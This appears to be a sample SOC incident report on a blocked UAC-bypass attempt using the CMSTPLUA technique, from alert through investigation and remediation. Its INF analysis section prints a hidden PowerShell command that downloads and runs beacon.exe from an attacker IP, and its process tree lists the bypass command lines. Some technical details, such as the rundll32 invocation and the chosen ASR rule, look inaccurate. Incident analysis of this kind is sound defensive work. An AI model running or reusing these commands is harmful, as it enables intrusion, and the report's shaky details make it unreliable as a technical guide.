Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842 Alert Time: 2024-03-10 11:30:22 EST Severity: HIGH (88/100) Source: Microsoft Defender for Endpoint Rule: “UAC Bypass Attempt Detected – CMSTPLUA Technique” MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: HR-WS-023 (HR Workstation) User: kwilson@company.com (Karen Wilson, HR) Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
rundll32.exe (PID: 4789)
Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
cmstp.exe (PID: 4792)
Command: cmstp.exe /s C:\Users\kwilson\AppData\Local\Temp\install.inf
File Created:
C:\Users\kwilson\AppData\Local\Temp\install.inf
Content: Malicious INF file designed to execute elevated command
Detection Logic:
CMSTPLUA COM interface known UAC bypass technique (UACME #23)
User kwilson is standard user, should not get high integrity
INF file contains suspicious commands
Pattern matches UAC bypass for privilege escalation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed UAC bypass attempt
2. INF Analysis
Analyze install.inf
Manual review, Sandbox
INF file executes PowerShell to download payload
3. Process Investigation
Identify source
CrowdStrike
User clicked “update” pop-up
4. User Interview
Contact kwilson
Teams, Phone
User clicked fake Adobe Flash update
5. Immediate Action
Terminate processes, delete INF
Defender
Processes killed; INF removed
6. Account Remediation
Reset password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-198 Summary: T1548.002 – UAC Bypass Attempt via CMSTPLUA Status: RESOLVED Resolution: MALICIOUS – UAC Bypass Blocked Priority: P2 – MEDIUM Labels: T1548, uac-bypass, cmstplua, defender, phishing Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected – CMSTPLUA Technique”.
Host: HR-WS-023 (HR, user kwilson).
Technique: CMSTPLUA COM interface.
Time: 2024-03-10 11:30 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
11:10 – User visits compromised site, sees fake “Adobe Flash Update”
11:12 – User clicks, downloads installer.inf
11:15 – User runs the file (or script runs automatically)
11:20 – PowerShell creates install.inf in Temp
11:22 – Script triggers UAC bypass via cmstplua.dll
11:23 – cmstp.exe launches with install.inf
11:24 – INF file runs PowerShell as high integrity
11:25 – Defender detects
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf
Content:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe”
Effect: Runs PowerShell with high integrity, downloading Cobalt Strike
Impact:
UAC bypass partially successful? (processes killed before full execution)
3. Investigation Findings:
Timeline:
11:10 – User visits site
11:15-11:24 – Bypass chain
11:25 – Alert
11:27 – SOC investigates
11:28 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\install.inf
Network:
– http://185.143.221[.]89/beacon.exe
4. Containment Actions:
Immediate Actions:
Terminated cmstp.exe and rundll32.exe.
Deleted install.inf.
Blocked download URL.
Reset user password.
Host Remediation:
Full scan (clean).
5. Root Cause Analysis:
Primary Cause: User tricked by fake update.
Contributing Factors:
UAC bypass technique not blocked.
6. Business Impact:
Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
UAC bypass stopped.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked cmstp.exe execution for standard users.
8. Conclusion:
An attacker attempted to bypass UAC using the CMSTPLUA technique to gain elevated privileges. Defender detected the attempt and terminated the processes before full compromise.
Closure Rationale: UAC bypass blocked; files removed; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 12:30 EST